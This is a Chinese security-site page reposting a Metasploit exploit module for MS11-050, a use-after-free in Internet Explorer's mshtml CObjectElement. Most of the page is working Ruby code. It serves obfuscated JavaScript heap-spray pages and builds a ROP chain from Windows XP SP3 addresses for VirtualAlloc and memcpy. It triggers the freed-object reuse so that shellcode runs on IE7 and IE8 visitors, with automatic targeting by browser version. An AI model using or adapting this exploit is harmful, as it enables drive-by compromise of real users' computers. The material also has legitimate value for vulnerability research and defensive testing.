首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS11-050 IE mshtml!CObjectElement Use After Free
来源:http://www.metasploit.com 作者:d0c_s4vage 发布时间:2011-06-21  

##
# $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
  :ua_name    => HttpClients::IE,
  :ua_minver  => "7.0",
  :ua_maxver  => "8.0",
  :javascript => true,
  :os_name    => OperatingSystems::WINDOWS,
  :vuln_test  => nil,
 })

 def initialize(info={})
  super(update_info(info,
   'Name'           => "MS11-050 IE mshtml!CObjectElement Use After Free",
   'Description'    => %q{
     This module exploits a use-after-free vulnerability in Internet Explorer. The
    vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover
    where the object tag should be when rendered (due to their styles/positioning). The
    mshtml!CObjectElement is then freed from memory because it is invalid. However, the
    mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and
    attempts to call a function on it, leading to the use-after-free.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 12962 $",
   'Author'         =>
    [
     'd0c_s4vage',
    ],
   'References'     =>
    [
     ['CVE', '2011-1256'],
     ['OSVDB', '72948'],
     ['MSB', 'MS11-050'],
     ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'    => 500,
     'BadChars' => "\x00\x09\x0a\x0d'\\",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic', { } ],

     # In IE6 the mshtml!CObjectElement size is 0xac
     [
      'Win XP SP3 Internet Explorer 7', # 7.0.5730.13
      {
       # sizeof(mshtml!CObjectElement)
       'FreedObjSize' =>  0xb0,
       'FakeObjCount' => 0x4000,
       'FakeObjCountKeep' => 0x2000,
       'ForLoopNumObjects' => 3,
       'FreedObjOverwritePointer'=>0x0c0c0c0c,
       'FreedObjOffsetAlignSize'=>0,
       'ROP' => false,
      }
     ],

     [
      'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702
      {
       # sizeof(mshtml!CObjectElement)
       'FreedObjSize' =>  0xe0, # 0xdc rounded up
       'FakeObjCount' => 0x8000,
       'FakeObjCountKeep' => 0x3000,
       'ForLoopNumObjects' => 5,
       'FreedObjOverwritePointer'=>0x0c0c0c0c,
       'FreedObjOffsetAlignSize'=>0,
       'ROP' => false,
      }
     ],

     [
      'Win XP SP3 Internet Explorer 8',
      {
       'FreedObjSize' =>  0xe0, # 0xdc rounded up
       'FakeObjCount' => 0x8000,
       'FakeObjCountKeep' => 0x3000,
       'ForLoopNumObjects' => 5,
       'FreedObjOverwritePointer'=>0x0c0c0c0c,
       'FreedObjOffsetAlignSize'=>2,
       #'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll
       'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll
       'ROP' => true,
      }
     ],

     [
      'Debug Target (Crash)', {}
     ],
    ],
   'DisclosureDate' => "Jun 16 2011",
   'DefaultTarget'  => 0))
 end

 def auto_target(cli, request)
  agent = request.headers['User-Agent']
  if agent =~ /MSIE 8\.0/
   mytarget = targets[3] # IE 8
  elsif agent =~ /MSIE 7\.0/
   mytarget = targets[1]
  else
   print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
  end

  mytarget
 end


 # 3/22/2011
 # fully patched x32 WinXP SP3, IE 8.0.6001.18702
 def winxp_sp3_rva
  {
   #"kernel32!VirtualAlloc"  => 0x7c809af1,
   "kernel32!VirtualAlloc" => 0x7c809ae1,
   "ntdll!memcpy"           => 0x7c901db3,
  }
 end

 def compile_rop(rop_stack)
  rva = winxp_sp3_rva()
  num_random = 0
  rop_stack.map do |rop_val|
   case rop_val
   when String
    if rop_val == "random"
     # useful for debugging
     # num_random += 1
     # 0xaabbcc00 + num_random
     rand(0xffffffff)
    else
     raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]
     rva[rop_val]
    end
   when Integer
    rop_val
   else
    raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"
   end
  end.pack("V*")
 end

 def on_request_uri(cli, request)
  mytarget = target
  if target.name == 'Automatic'
   mytarget = auto_target(cli, request)
   unless mytarget
    send_not_found(cli)
    return
   end
  end
  @mytarget = mytarget
  @debug = true if mytarget == targets[4]

  return if ((p = regenerate_payload(cli)) == nil)
  
  id_name  = rand_text_alpha(5)
  dir_name = rand_text_alpha(3)

  if @debug
   data = <<-DATA
   <html>
   <body>
   <script language='javascript'>
   document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>";
   document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>";
   document.body.innerHTML += "AAAAAAA";
   document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>";
   </script>
   </body>
   </html>
   DATA

   print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
   send_response(cli, data, { 'Content-Type' => 'text/html' })
   return
  end

  raw_shellcode = payload.encoded
  shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))

  spray = nil
  rop_shellcode_spray = nil

  obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")

  if @mytarget['ROP']
   rop_stack = []
   0x1f.times do |i|
    rop_stack << "random"
   end

   idx = -1
   idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc"   # 1:
   idx += 1 ; rop_stack[idx] = "ntdll!memcpy"            # 2:ret 10 to this after VirtualAlloc
   idx += 1 ; rop_stack[idx] = 0x7f000000                # 1:VirtualAlloc:lpAddress
   idx += 1 ; rop_stack[idx] = 0x4000                    # 1:VirtualAlloc:dwSize
   idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000)         # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
   idx += 1 ; rop_stack[idx] = 0x40                      # 1:VirtualAlloc:flProtect rwx
   idx += 1 ; rop_stack[idx] = 0x7f001000                # 3:into this after memcpy
   idx += 1 ; rop_stack[idx] = 0x7f001000                # 2:memcpy:dst
   idx += 1 ; rop_stack[idx] = 0x23000100                # 2:memcpy:src
   idx += 1 ; rop_stack[idx] = 0x2fff                    # 2:memcpy:size

   # align the rest of it
   back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)
   rop_stack = back + rop_stack

   rop_stack << @mytarget['StackPivot']

   # align the stack for 0c0c0c0c
   front = rop_stack.slice!(0, 19)
   rop_stack = rop_stack + front

   # resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)
   rop = compile_rop(rop_stack)

   nops = make_nops(0x1000 - raw_shellcode.length)
   nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))

   #spray up to 0x23000000
   rop_shellcode_spray = <<-JS
   var shellcode = unescape("#{shellcode}");
   var nops = unescape("#{nops}");
   while(nops.length < 0x1000) nops += nops;
    var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;
    while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;
     var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);
     for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }
   JS

   spray = rop
   shellcode = ""
  else
   spray = obj_overwrite_ptr
  end

  spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))

  js = <<-JS
  heap_obj = new heapLib.ie(0x20000);
  var heapspray = unescape("#{spray}");
  while(heapspray.length < 0x1000) heapspray += heapspray;
   var shellcode = unescape("#{shellcode}");
   var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;
   var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};
   var front = heapblock.substring(0, offset);
   var end = heapblock.substring(offset);
   heapblock = end + front;
   while(heapblock.length < 0x20000) heapblock += heapblock;
    finalspray = heapblock.substring(0, (0x10000-6)/2);
    for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }

    #{rop_shellcode_spray}

    var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");
    while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }
    obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);

    for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {
     document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
    }

    for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }
    for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }

    document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
    document.body.innerHTML += "AAAA";
    document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
  JS

  js = heaplib(js)
  js = ::Rex::Exploitation::JSObfu.new(js)
  js.obfuscate

  html = <<-HTML
  <html>
  <body>
  <script language='javascript'>
  #{js}
  </script>
  </body>
  </html>
  HTML

  print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")

  send_response(cli, html, {'Content-Type'=>'text/html'})
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Black Ice Cover Page SDK insec
·Gogago YouTube Video Converter
·Black Ice Fax Voice SDK v12.6
·DATAC RealWin SCADA Server 2 O
·Internet Explorer6 空指针访问
·XnView 1.98 Denial of Service
·MS HyperV Persistent DoS Vulne
·DreamBox DM800 Arbitrary File
·Conky Linux 1.8.0 Local DoS/Po
·Jaangle v0.98.971 (.ogg) Local
·Microsoft Office XP Remote cod
·FreeBSD/x86 Alphanumeric Bomb
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved